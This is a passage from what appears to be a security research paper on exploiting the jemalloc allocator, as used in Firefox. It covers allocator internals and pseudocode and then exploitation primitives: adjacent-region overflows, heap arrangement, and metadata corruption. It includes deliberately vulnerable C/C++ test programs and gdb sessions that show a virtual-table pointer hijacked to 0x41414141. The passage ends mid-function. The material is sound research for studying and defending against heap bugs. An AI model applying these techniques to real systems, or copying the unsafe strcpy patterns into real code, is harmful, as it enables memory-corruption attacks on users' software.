/dbg/firefox-11.0.app/Contents/MacOS/firefox.dSYM/
|
|
Contents/Resources/DWARF/firefox...done.
|
|
0x00007fff8636b67a in ?? () from /usr/lib/system/libsystem_kernel.dylib
|
|
(gdb) source unmask_jemalloc.py
|
|
(gdb) unmask_jemalloc
|
|
|
|
[jemalloc] [number of arenas: 1]
|
|
[jemalloc] [number of bins: 35]
|
|
[jemalloc] [no magazines/thread caches detected]
|
|
|
|
[jemalloc] [arena #00] [bin #00] [region size: 0x0008]
|
|
[current run at: 0x108fe0000]
|
|
[jemalloc] [arena #00] [bin #01] [region size: 0x0010]
|
|
[current run at: 0x1003f5000]
|
|
[jemalloc] [arena #00] [bin #02] [region size: 0x0020]
|
|
[current run at: 0x1003bc000]
|
|
[jemalloc] [arena #00] [bin #03] [region size: 0x0030]
|
|
[current run at: 0x1003d7000]
|
|
[jemalloc] [arena #00] [bin #04] [region size: 0x0040]
|
|
[current run at: 0x1054c6000]
|
|
[jemalloc] [arena #00] [bin #05] [region size: 0x0050]
|
|
[current run at: 0x103652000]
|
|
[jemalloc] [arena #00] [bin #06] [region size: 0x0060]
|
|
[current run at: 0x110c9c000]
|
|
[jemalloc] [arena #00] [bin #07] [region size: 0x0070]
|
|
[current run at: 0x106bef000]
|
|
[jemalloc] [arena #00] [bin #08] [region size: 0x0080]
|
|
[current run at: 0x10693b000]
|
|
[jemalloc] [arena #00] [bin #09] [region size: 0x0090]
|
|
[current run at: 0x10692e000]
|
|
[jemalloc] [arena #00] [bin #10] [region size: 0x00a0]
|
|
[current run at: 0x106743000]
|
|
[jemalloc] [arena #00] [bin #11] [region size: 0x00b0]
|
|
[current run at: 0x109525000]
|
|
[jemalloc] [arena #00] [bin #12] [region size: 0x00c0]
|
|
[current run at: 0x1127c2000]
|
|
[jemalloc] [arena #00] [bin #13] [region size: 0x00d0]
|
|
[current run at: 0x106797000]
|
|
[jemalloc] [arena #00] [bin #14] [region size: 0x00e0]
|
|
[current run at: 0x109296000]
|
|
[jemalloc] [arena #00] [bin #15] [region size: 0x00f0]
|
|
[current run at: 0x110aa9000]
|
|
[jemalloc] [arena #00] [bin #16] [region size: 0x0100]
|
|
[current run at: 0x106c70000]
|
|
[jemalloc] [arena #00] [bin #17] [region size: 0x0110]
|
|
[current run at: 0x109556000]
|
|
[jemalloc] [arena #00] [bin #18] [region size: 0x0120]
|
|
[current run at: 0x1092bf000]
|
|
[jemalloc] [arena #00] [bin #19] [region size: 0x0130]
|
|
[current run at: 0x1092a2000]
|
|
[jemalloc] [arena #00] [bin #20] [region size: 0x0140]
|
|
[current run at: 0x10036a000]
|
|
[jemalloc] [arena #00] [bin #21] [region size: 0x0150]
|
|
[current run at: 0x100353000]
|
|
[jemalloc] [arena #00] [bin #22] [region size: 0x0160]
|
|
[current run at: 0x1093d3000]
|
|
[jemalloc] [arena #00] [bin #23] [region size: 0x0170]
|
|
[current run at: 0x10f024000]
|
|
[jemalloc] [arena #00] [bin #24] [region size: 0x0180]
|
|
[current run at: 0x106b58000]
|
|
[jemalloc] [arena #00] [bin #25] [region size: 0x0190]
|
|
[current run at: 0x10f002000]
|
|
[jemalloc] [arena #00] [bin #26] [region size: 0x01a0]
|
|
[current run at: 0x10f071000]
|
|
[jemalloc] [arena #00] [bin #27] [region size: 0x01b0]
|
|
[current run at: 0x109139000]
|
|
[jemalloc] [arena #00] [bin #28] [region size: 0x01c0]
|
|
[current run at: 0x1091c6000]
|
|
[jemalloc] [arena #00] [bin #29] [region size: 0x01d0]
|
|
[current run at: 0x10032a000]
|
|
[jemalloc] [arena #00] [bin #30] [region size: 0x01e0]
|
|
[current run at: 0x1054f9000]
|
|
[jemalloc] [arena #00] [bin #31] [region size: 0x01f0]
|
|
[current run at: 0x10034c000]
|
|
[jemalloc] [arena #00] [bin #32] [region size: 0x0200]
|
|
[current run at: 0x106739000]
|
|
[jemalloc] [arena #00] [bin #33] [region size: 0x0400]
|
|
[current run at: 0x106c68000]
|
|
[jemalloc] [arena #00] [bin #34] [region size: 0x0800]
|
|
[current run at: 0x10367e000]
|
|
|
|
|
|
We did our best to test unmask_jemalloc.py on all jemalloc variants,
|
|
however there are probably some bugs left. Feel free to test it and send us
|
|
patches. The development of unmask_jemalloc.py will continue at [UJEM].
|
|
|
|
|
|
----[ 2.2 - Algorithms
|
|
|
|
In this section we present pseudocode the describes the allocation and
|
|
deallocation algorithms implemented by jemalloc. We start with malloc():
|
|
|
|
|
|
MALLOC(size):
|
|
IF size CAN BE SERVICED BY AN ARENA:
|
|
IF size IS SMALL OR MEDIUM:
|
|
bin = get_bin_for_size(size)
|
|
|
|
IF bin->runcur EXISTS AND NOT FULL:
|
|
run = bin->runcur
|
|
ELSE:
|
|
run = lookup_or_allocate_nonfull_run()
|
|
bin->runcur = run
|
|
|
|
bit = get_first_set_bit(run->regs_mask)
|
|
region = get_region(run, bit)
|
|
|
|
ELIF size IS LARGE:
|
|
region = allocate_new_run()
|
|
ELSE:
|
|
region = allocate_new_chunk()
|
|
RETURN region
|
|
|
|
|
|
calloc() is as you would expect:
|
|
|
|
|
|
CALLOC(n, size):
|
|
RETURN MALLOC(n * size)
|
|
|
|
|
|
Finally, the pseudocode for free():
|
|
|
|
|
|
FREE(addr):
|
|
IF addr IS NOT EQUAL TO THE CHUNK IT BELONGS:
|
|
IF addr IS A SMALL ALLOCATION:
|
|
run = get_run_addr_belongs_to(addr);
|
|
bin = run->bin;
|
|
size = bin->reg_size;
|
|
element = get_element_index(addr, run, bin)
|
|
unset_bit(run->regs_mask[element])
|
|
|
|
ELSE: /* addr is a large allocation */
|
|
run = get_run_addr_belongs_to(addr)
|
|
chunk = get_chunk_run_belongs_to(run)
|
|
run_index = get_run_index(run, chunk)
|
|
mark_pages_of_run_as_free(run_index)
|
|
|
|
IF ALL THE PAGES OF chunk ARE MARKED AS FREE:
|
|
unmap_the_chunk_s_pages(chunk)
|
|
|
|
ELSE: /* this is a huge allocation */
|
|
unmap_the_huge_allocation_s_pages(addr)
|
|
|
|
|
|
--[ 3 - Exploitation tactics
|
|
|
|
In this section we analyze the exploitation tactics we have investigated
|
|
against jemalloc. Our goal is to provide to the interested hackers the
|
|
necessary knowledge and tools to develop exploits for jemalloc heap
|
|
corruption bugs.
|
|
|
|
We also try to approach jemalloc heap exploitation in an abstract way
|
|
initially, identifying 'exploitation primitives' and then continuing into
|
|
the specific required technical details. Chris Valasek and Ryan Smith have
|
|
explored the value of abstracting heap exploitation through primitives
|
|
[CVRS]. The main idea is that specific exploitation techniques eventually
|
|
become obsolete. Therefore it is important to approach exploitation
|
|
abstractly and identify primitives that can applied to new targets. We have
|
|
used this approach before, comparing FreeBSD and Linux kernel heap
|
|
exploitation [HAPF, APHN]. Regarding jemalloc, we analyze adjacent data
|
|
corruption, heap manipulation and metadata corruption exploitation
|
|
primitives.
|
|
|
|
|
|
----[ 3.1 - Adjacent region corruption
|
|
|
|
The main idea behind adjacent heap item corruptions is that you exploit the
|
|
fact that the heap manager places user allocations next to each other
|
|
contiguously without other data in between. In jemalloc regions of the same
|
|
size class are placed on the same bin. In the case that they are also
|
|
placed on the same run of the bin then there are no inline metadata between
|
|
them. In 3.2 we will see how we can force this, but for now let's assume
|
|
that new allocations of the same size class are placed in the same run.
|
|
|
|
Therefore, we can place a victim object/structure of our choosing in the
|
|
same run and next to the vulnerable object/structure we plan to overflow.
|
|
The only requirement is that the victim and vulnerable objects need to be
|
|
of a size that puts them in the same size class and therefore possibly in
|
|
the same run (again, see the next subsection on how to control this). Since
|
|
there are no metadata between the two regions, we can overflow from the
|
|
vulnerable region to the victim region we have chosen. Usually the victim
|
|
region is something that can help us achieve arbitrary code execution, for
|
|
example function pointers.
|
|
|
|
In the following contrived example consider that 'three' is your chosen
|
|
victim object and that the vulnerable object is 'two' (full code in file
|
|
test-adjacent.c):
|
|
|
|
|
|
char *one, *two, *three;
|
|
|
|
printf("[*] before overflowing\n");
|
|
|
|
one = malloc(0x10);
|
|
memset(one, 0x41, 0x10);
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
|
|
two = malloc(0x10);
|
|
memset(two, 0x42, 0x10);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
|
|
three = malloc(0x10);
|
|
memset(three, 0x43, 0x10);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
[3-1]
|
|
|
|
printf("[+] copying argv[1] to region two\n");
|
|
strcpy(two, argv[1]);
|
|
|
|
printf("[*] after overflowing\n");
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
[3-2]
|
|
|
|
free(one);
|
|
free(two);
|
|
free(three);
|
|
|
|
printf("[*] after freeing all regions\n");
|
|
printf("[+] region one:\t\t0x%x: %s\n", (unsigned int)one, one);
|
|
printf("[+] region two:\t\t0x%x: %s\n", (unsigned int)two, two);
|
|
printf("[+] region three:\t0x%x: %s\n", (unsigned int)three, three);
|
|
|
|
[3-3]
|
|
|
|
|
|
The output (edited for readability):
|
|
|
|
|
|
$ ./test-adjacent `python -c 'print "X" * 30'`
|
|
[*] before overflowing
|
|
[+] region one: 0xb7003030: AAAAAAAAAAAAAAAA
|
|
[+] region two: 0xb7003040: BBBBBBBBBBBBBBBB
|
|
[+] region three: 0xb7003050: CCCCCCCCCCCCCCCC
|
|
[+] copying argv[1] to region two
|
|
[*] after overflowing
|
|
[+] region one: 0xb7003030:
|
|
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region two: 0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region three: 0xb7003050: XXXXXXXXXXXXXX
|
|
[*] after freeing all regions
|
|
[+] region one: 0xb7003030:
|
|
AAAAAAAAAAAAAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region two: 0xb7003040: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
|
[+] region three: 0xb7003050: XXXXXXXXXXXXXX
|
|
|
|
|
|
Examining the above we can see that region 'one' is at 0xb7003030 and that
|
|
the following two allocations (regions 'two' and 'three') are in the same
|
|
run immediately after 'one' and all three next to each other without any
|
|
metadata in between them. After the overflow of 'two' with 30 'X's we can
|
|
see that region 'three' has been overwritten with 14 'X's (30 - 16 for the
|
|
size of region 'two').
|
|
|
|
In order to achieve a better understanding of the jemalloc memory layout
|
|
let's fire up gdb with three breakpoints at [3-1], [3-2] and [3-3].
|
|
|
|
At breakpoint [3-1]:
|
|
|
|
|
|
Breakpoint 1, 0x080486a9 in main ()
|
|
gdb $ print arenas[0].bins[2].runcur
|
|
$1 = (arena_run_t *) 0xb7003000
|
|
|
|
|
|
At 0xb7003000 is the current run of the bin bins[2] that manages the size
|
|
class 16 in the standalone jemalloc flavor that we have linked against.
|
|
Let's take a look at the run's contents:
|
|
|
|
|
|
gdb $ x/40x 0xb7003000
|
|
0xb7003000: 0xb78007ec 0x00000003 0x000000fa 0xfffffff8
|
|
0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
|
|
0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff
|
|
0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7003040: 0x42424242 0x42424242 0x42424242 0x42424242
|
|
0xb7003050: 0x43434343 0x43434343 0x43434343 0x43434343
|
|
0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
After some initial metadata (the run's header which we will see in more
|
|
detail at 3.3.1) we have region 'one' at 0xb7003030 followed by regions
|
|
'two' and 'three', all of size 16 bytes. Again we can see that there are no
|
|
metadata between the regions. Continuing to breakpoint [3-2] and examining
|
|
again the contents of the run:
|
|
|
|
|
|
Breakpoint 2, 0x08048724 in main ()
|
|
gdb $ x/40x 0xb7003000
|
|
0xb7003000: 0xb78007ec 0x00000003 0x000000fa 0xfffffff8
|
|
0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
|
|
0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff
|
|
0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7003040: 0x58585858 0x58585858 0x58585858 0x58585858
|
|
0xb7003050: 0x58585858 0x58585858 0x58585858 0x43005858
|
|
0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
We can see that our 30 'X's (0x58) have overwritten the complete 16 bytes
|
|
of region 'two' at 0xb7003040 and continued for 15 bytes (14 plus a NULL
|
|
from strcpy(3)) in region 'three' at 0xb7003050. From this memory dump it
|
|
should be clear why the printf(3) call of region 'one' after the overflow
|
|
continues to print all 46 bytes (16 from region 'one' plus 30 from the
|
|
overflow) up to the NULL placed by the strcpy(3) call. As it has been
|
|
demonstrated by Peter Vreugdenhil in the context of Internet Explorer heap
|
|
overflows [PV10], this can lead to information leaks from the region that
|
|
is adjacent to the region with the string whose terminating NULL has been
|
|
overwritten. You just need to read back the string and you will get all
|
|
data up to the first encountered NULL.
|
|
|
|
At breakpoint [3-3] after the deallocation of all three regions:
|
|
|
|
|
|
Breakpoint 3, 0x080487ab in main ()
|
|
gdb $ x/40x 0xb7003000
|
|
0xb7003000: 0xb78007ec 0x00000003 0x000000fd 0xffffffff
|
|
0xb7003010: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
|
|
0xb7003020: 0xffffffff 0xffffffff 0x1fffffff 0x000000ff
|
|
0xb7003030: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7003040: 0x58585858 0x58585858 0x58585858 0x58585858
|
|
0xb7003050: 0x58585858 0x58585858 0x58585858 0x43005858
|
|
0xb7003060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003070: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7003090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
We can see that jemalloc does not clear the freed regions. This behavior of
|
|
leaving stale data in regions that have been freed and can be allocated
|
|
again can lead to easier exploitation of use-after-free bugs (see next
|
|
section).
|
|
|
|
To explore the adjacent region corruption primitive further in the context
|
|
of jemalloc, we will now look at C++ and virtual function pointers (VPTRs).
|
|
We will only focus on jemalloc-related details; for more general
|
|
information the interested reader should see rix's Phrack paper (the
|
|
principles of which are still applicable) [VPTR]. We begin with a C++
|
|
example that is based on rix's bo2.cpp (file vuln-vptr.cpp in the code
|
|
archive):
|
|
|
|
|
|
class base
|
|
{
|
|
private:
|
|
|
|
char buf[32];
|
|
|
|
public:
|
|
|
|
void
|
|
copy(const char *str)
|
|
{
|
|
strcpy(buf, str);
|
|
}
|
|
|
|
virtual void
|
|
print(void)
|
|
{
|
|
printf("buf: 0x%08x: %s\n", buf, buf);
|
|
}
|
|
};
|
|
|
|
class derived_a : public base
|
|
{
|
|
public:
|
|
|
|
void
|
|
print(void)
|
|
{
|
|
printf("[+] derived_a: ");
|
|
base::print();
|
|
}
|
|
};
|
|
|
|
class derived_b : public base
|
|
{
|
|
public:
|
|
|
|
void
|
|
print(void)
|
|
{
|
|
printf("[+] derived_b: ");
|
|
base::print();
|
|
}
|
|
};
|
|
|
|
int
|
|
main(int argc, char *argv[])
|
|
{
|
|
base *obj_a;
|
|
base *obj_b;
|
|
|
|
obj_a = new derived_a;
|
|
obj_b = new derived_b;
|
|
|
|
printf("[+] obj_a:\t0x%x\n", (unsigned int)obj_a);
|
|
printf("[+] obj_b:\t0x%x\n", (unsigned int)obj_b);
|
|
|
|
if(argc == 3)
|
|
{
|
|
printf("[+] overflowing from obj_a into obj_b\n");
|
|
obj_a->copy(argv[1]);
|
|
|
|
obj_b->copy(argv[2]);
|
|
|
|
obj_a->print();
|
|
obj_b->print();
|
|
|
|
return 0;
|
|
}
|
|
|
|
|
|
We have a base class with a virtual function, 'print(void)', and two
|
|
derived classes that overload this virtual function. Then in main, we use
|
|
'new' to create two new objects, one from each of the derived classes.
|
|
Subsequently we overflow the 'buf' buffer of 'obj_a' with 'argv[1]'.
|
|
|
|
Let's explore with gdb:
|
|
|
|
|
|
$ gdb vuln-vptr
|
|
...
|
|
gdb $ r `python -c 'print "A" * 48'` `python -c 'print "B" * 10'`
|
|
...
|
|
0x804862f <main(int, char**)+15>: movl $0x24,(%esp)
|
|
0x8048636 <main(int, char**)+22>: call 0x80485fc <_Znwj@plt>
|
|
0x804863b <main(int, char**)+27>: movl $0x80489e0,(%eax)
|
|
gdb $ print $eax
|
|
$13 = 0xb7c01040
|
|
|
|
|
|
At 0x8048636 we can see the first 'new' call which takes as a parameter the
|
|
size of the object to create, that is 0x24 or 36 bytes. C++ will of course
|
|
use jemalloc to allocate the required amount of memory for this new object.
|
|
After the call instruction, EAX has the address of the allocated region
|
|
(0xb7c01040) and at 0x804863b the value 0x80489e0 is moved there. This is
|
|
the VPTR that points to 'print(void)' of 'obj_a':
|
|
|
|
|
|
gdb $ x/x *0x080489e0
|
|
0x80487d0 <derived_a::print()>: 0xc71cec83
|
|
|
|
|
|
Now it must be clear why even though the declared buffer is 32 bytes long,
|
|
there are 36 bytes allocated for the object. Exactly the same as above
|
|
happens with the second 'new' call, but this time the VPTR points to
|
|
'obj_b' (which is at 0xb7c01070):
|
|
|
|
|
|
0x8048643 <main(int, char**)+35>: movl $0x24,(%esp)
|
|
0x804864a <main(int, char**)+42>: call 0x80485fc <_Znwj@plt>
|
|
0x804864f <main(int, char**)+47>: movl $0x80489f0,(%eax)
|
|
gdb $ x/x *0x080489f0
|
|
0x8048800 <derived_b::print()>: 0xc71cec83
|
|
gdb $ print $eax
|
|
$14 = 0xb7c01070
|
|
|
|
|
|
At this point, let's explore jemalloc's internals:
|
|
|
|
|
|
gdb $ print arenas[0].bins[5].runcur
|
|
$8 = (arena_run_t *) 0xb7c01000
|
|
gdb $ print arenas[0].bins[5].reg_size
|
|
$9 = 0x30
|
|
gdb $ print arenas[0].bins[4].reg_size
|
|
$10 = 0x20
|
|
gdb $ x/40x 0xb7c01000
|
|
0xb7c01000: 0xb7fd315c 0x00000000 0x00000052 0xfffffffc
|
|
0xb7c01010: 0xffffffff 0x000fffff 0x00000000 0x00000000
|
|
0xb7c01020: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01030: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01040: 0x080489e0 0x00000000 0x00000000 0x00000000
|
|
0xb7c01050: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01060: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01070: 0x080489f0 0x00000000 0x00000000 0x00000000
|
|
0xb7c01080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
|
|
|
|
Our run is at 0xb7c01000 and the bin is bin[5] which handles regions of
|
|
size 0x30 (48 in decimal). Since our objects are of size 36 bytes they
|
|
don't fit in the previous bin, i.e. bin[4], of size 0x20 (32). We can see
|
|
'obj_a' at 0xb7c01040 with its VPTR (0x080489e0) and 'obj_b' at 0xb7c01070
|
|
with its own VPTR (0x080489f0).
|
|
|
|
Our next breakpoint is after the overflow of 'obj_a' into 'obj_b' and just
|
|
before the first call of 'print()'. Our run now looks like the following:
|
|
|
|
|
|
gdb $ x/40x 0xb7c01000
|
|
0xb7c01000: 0xb7fd315c 0x00000000 0x00000052 0xfffffffc
|
|
0xb7c01010: 0xffffffff 0x000fffff 0x00000000 0x00000000
|
|
0xb7c01020: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01030: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01040: 0x080489e0 0x41414141 0x41414141 0x41414141
|
|
0xb7c01050: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7c01060: 0x41414141 0x41414141 0x41414141 0x41414141
|
|
0xb7c01070: 0x41414141 0x42424242 0x42424242 0x00004242
|
|
0xb7c01080: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
0xb7c01090: 0x00000000 0x00000000 0x00000000 0x00000000
|
|
gdb $ x/i $eip
|
|
0x80486d1 <main(int, char**)+177>: call *(%eax)
|
|
gdb $ print $eax
|
|
$15 = 0x80489e0
|
|
|
|
|
|
At 0x080486d1 is the call of 'print()' of 'obj_a'. At 0xb7c01070 we can see
|
|
that we have overwritten the VPTR of 'obj_b' that was in an adjacent region
|
|
to 'obj_a'. Finally, at the call of 'print()' by 'obj_b':
|
|
|
|
|
|
gdb $ x/i $eip
|
|
=> 0x80486d8 <main(int, char**)+184>: call *(%eax)
|
|
gdb $ print $eax
|
|
$16 = 0x41414141
|
|
|
|
|
|
----[ 3.2 - Heap manipulation
|
|
|
|
In order to be able to arrange the jemalloc heap in a predictable state we
|
|
need to understand the allocator's behavior and use heap manipulation
|
|
tactics to influence it to our advantage. In the context of browsers, heap
|
|
manipulation tactics are usually referred to as 'Heap Feng Shui' after
|
|
Alexander Sotirov's work [FENG].
|
|
|
|
By 'predictable state' we mean that the heap must be arranged as reliably
|
|
as possible in a way that we can position data where we want. This enables
|
|
us to use the tactic of corrupting adjacent regions of the previous
|
|
paragraph, but also to exploit use-after-free bugs. In use-after-free
|
|
bugs a memory region is allocated, used, freed and then used again due
|
|
to a bug. In such a case if we know the region's size we can manipulate
|
|
the heap to place data of our own choosing in the freed region's memory
|
|
slot on its run before it is used again. Upon its subsequent incorrect use
|
|
the region now has our data that can help us hijack the flow of execution.
|
|
|
|
To explore jemalloc's behavior and manipulate it into a predictable
|
|
state we use an algorithm similar to the one presented in [HOEJ]. Since
|
|
in the general case we cannot know beforehand the state of the runs of
|
|
the class size we are interested in, we perform many allocations of this
|
|
size hoping to cover the holes (i.e. free regions) in the existing runs
|
|
and get a fresh run. Hopefully the next series of allocations we will
|
|
perform will be on this fresh run and therefore will be sequential. As
|
|
we have seen, sequential allocations on a largely empty run are also
|
|
contiguous. Next, we perform such a series of allocations controlled by
|
|
us. In the case we are trying to use the adjacent regions corruption
|
|
tactic, these allocations are of the victim object/structure we have
|
|
chosen to help us gain code execution when corrupted.
|
|
|
|
The following step is to deallocate every second region in this last series
|
|
of controlled victim allocations. This will create holes in between the
|
|
victim objects/structures on the run of the size class we are trying to
|
|
manipulate. Finally, we trigger the heap overflow bug forcing, due to the
|
|
state we have arranged, jemalloc to place the vulnerable objects in holes
|
|
on the target run overflowing into the victim objects.
|
|
|
|
Let's demonstrate the above discussion with an example (file test-holes.c
|
|
in the code archive):
|
|
|
|
|
|
#define TSIZE 0x10 /* target size class */
|
|
#define NALLOC 500 /* number of allocations */
|
|
#define NFREE (NALLOC / 10) /* number of deallocations */
|
|
|
|
char *foo[NALLOC];
|
|
char *bar[NALLOC];
|
|
|
|
printf("step 1: controlled allocations of victim objects\n");
|
|
|
|
for(i = 0; i < NALLOC; i++)
|
|
{
|
|
foo[i] = malloc(TSIZE);
|
|
printf("foo[%d]:\t\t0x%x\n", i, (unsigned int)foo[i]);
|
|
}
|
|
|
|
printf("step 2: creating holes in between the victim objects\n");
|
|
|
|
for(i = (NALLOC - NFREE); i < NALLOC; i += 2)
|
|
{
|
|
printf("freeing foo[%d]:\t0x%x\n", i, (unsigned int)foo[i]);
|
|
free(foo[i]);
|
|
}
|
|
|
|
printf("step 3: fill holes with vulnerable objects\n");
|
|
|
|
for(i = (NALLOC - NFREE + 1); i < NALLOC; i += 2)
|
|
{
|
|
bar[i] = malloc(TSIZE);
|
|
printf("bar[%d]:\t0x%x\n", i, (unsigned int)bar[i]);
|
|
}
|
|
|
|
|
|
jemalloc's behavior can be observed in the output, remember that our target
|
|
size class is 16 bytes:
|
|
|
|
|
|
$ ./test-holes
|
|
step 1: controlled allocations of victim objects
|
|
foo[0]: 0x40201030
|
|
foo[1]: 0x40201040
|
|
foo[2]: 0x40201050
|
|
foo[3]: 0x40201060
|
|
foo[4]: 0x40201070
|
|
foo[5]: 0x40201080
|
|
foo[6]: 0x40201090
|
|
foo[7]: 0x402010a0
|
|
|
|
...
|
|
|
|
foo[447]: 0x40202c50
|
|
foo[448]: 0x40202c60
|
|
foo[449]: 0x40202c70
|
|
foo[450]: 0x40202c80
|
|
foo[451]: 0x40202c90
|
|
foo[452]: 0x40202ca0
|
|
foo[453]: 0x40202cb0
|
|
foo[454]: 0x40202cc0
|
|
foo[455]: 0x40202cd0
|
|
foo[456]: 0x40202ce0
|
|
foo[457]: 0x40202cf0
|
|
foo[458]: 0x40202d00
|
|
foo[459]: 0x40202d10
|
|
foo[460]: 0x40202d20
|
|
|
|
...
|
|
|
|
step 2: creating holes in between the victim objects
|
|
freeing foo[450]: 0x40202c80
|
|
freeing foo[452]: 0x40202ca0
|
|
freeing foo[454]: 0x40202cc0
|
|
freeing foo[456]: 0x40202ce0
|
|
freeing foo[458]: 0x40202d00
|
|
freeing foo[460]: 0x40202d20
|
|
freeing foo[462]: 0x40202d40
|
|
freeing foo[464]: 0x40202d60
|
|
freeing foo[466]: 0x40202d80
|
|
freeing foo[468]: 0x40202da0
|
|
freeing foo[470]: 0x40202dc0
|
|
freeing foo[472]: 0x40202de0
|
|
freeing foo[474]: 0x40202e00
|
|
freeing foo[476]: 0x40202e20
|
|
freeing foo[478]: 0x40202e40
|
|
freeing foo[480]: 0x40202e60
|
|
freeing foo[482]: 0x40202e80
|
|
freeing foo[484]: 0x40202ea0
|
|
freeing foo[486]: 0x40202ec0
|
|
freeing foo[488]: 0x40202ee0
|
|
freeing foo[490]: 0x40202f00
|
|
freeing foo[492]: 0x40202f20
|
|
freeing foo[494]: 0x40202f40
|
|
freeing foo[496]: 0x40202f60
|
|
freeing foo[498]: 0x40202f80
|
|
|
|
step 3: fill holes with vulnerable objects
|
|
bar[451]: 0x40202c80
|
|
bar[453]: 0x40202ca0
|
|
bar[455]: 0x40202cc0
|
|
bar[457]: 0x40202ce0
|
|
bar[459]: 0x40202d00
|
|
bar[461]: 0x40202d20
|
|
bar[463]: 0x40202d40
|
|
bar[465]: 0x40202d60
|
|
bar[467]: 0x40202d80
|
|
bar[469]: 0x40202da0
|
|
bar[471]: 0x40202dc0
|
|
bar[473]: 0x40202de0
|
|
bar[475]: 0x40202e00
|
|
bar[477]: 0x40202e20
|
|
bar[479]: 0x40202e40
|
|
bar[481]: 0x40202e60
|
|
bar[483]: 0x40202e80
|
|
bar[485]: 0x40202ea0
|
|
bar[487]: 0x40202ec0
|
|
bar[489]: 0x40202ee0
|
|
bar[491]: 0x40202f00
|
|
bar[493]: 0x40202f20
|
|
bar[495]: 0x40202f40
|
|
bar[497]: 0x40202f60
|
|
bar[499]: 0x40202f80
|
|
|
|
|
|
We can see that jemalloc works in a FIFO way; the first region freed is the
|
|
first returned for a subsequent allocation request. Although our example
|
|
mainly demonstrates how to manipulate the jemalloc heap to exploit adjacent
|
|
region corruptions, our observations can also help us to exploit
|
|
use-after-free vulnerabilities. When our goal is to get data of our own
|
|
choosing in the same region as a freed region about to be used, jemalloc's
|
|
FIFO behavior can he help us place our data in a predictable way.
|
|
|
|
In the above discussion we have implicitly assumed that we can make
|
|
arbitrary allocations and deallocations; i.e. that we have available in
|
|
our exploitation tool belt allocation and deallocation primitives for
|
|
our target size. Depending on the vulnerable application (that relies
|
|
on jemalloc) this may or may not be straightforward. For example, if
|
|
our target is a media player we may be able to control allocations by
|
|
introducing an arbitrary number of metadata tags in the input file. In
|
|
the case of Firefox we can of course use Javascript to implement our
|
|
heap primitives. But that's the topic of another paper.
|
|
|
|
|
|
----[ 3.3 - Metadata corruption
|
|
|
|
The final heap corruption primitive we will focus on is the corruption of
|
|
metadata. We will once again remind you that since jemalloc is not based
|
|
on freelists (it uses macro-based red black trees instead), unlink and
|
|
frontlink exploitation techniques are not usable. We will instead pay
|
|
attention on how we can force 'malloc()' return a pointer that points
|
|
to already initialized heap regions.
|
|
|
|
|
|
------[ 3.3.1 - Run (arena_run_t)
|
|
|
|
We have already defined what a 'run' is in section 2.1.3. We will briefly
|
|
remind the reader that a 'run' is just a collection of memory regions of
|
|
equal size that starts with some metadata describing it. Recall that runs
|
|
are always aligned to a multiple of the page size (0x1000 in most real
|
|
life applications). The run metadata obey the layout shown in [2-3].
|
|
|
|
For release builds the 'magic' field will not be present (that is,
|
|
MALLOC_DEBUG is off by default). As we have already mentioned, each
|
|
run contains a pointer to the bin whose regions it contains. The 'bin'
|
|
pointer is read and dereferenced from 'arena_run_t' (see [2-3]) only
|
|
during deallocation. On deallocation the region size is unknown, thus the
|
|
bin index cannot be computed directly, instead, jemalloc will first find
|
|
the run the memory to be freed is located and will then dereference the
|
|
bin pointer stored in the run's header. From function 'arena_dalloc_small':
|
|
|
|
|
|
arena_dalloc_small(arena_t *arena, arena_chunk_t *chunk, void *ptr,
|
|
arena_chunk_map_t *mapelm)
|
|
{
|
|
arena_run_t *run;
|
|
arena_bin_t *bin;
|
|
size_t size;
|
|
|
|
run = (arena_run_t *)(mapelm->bits & ~pagesize_mask);
|
|
bin = run->bin;
|
|
size = bin->reg_size;
|
|
|
|
|
|
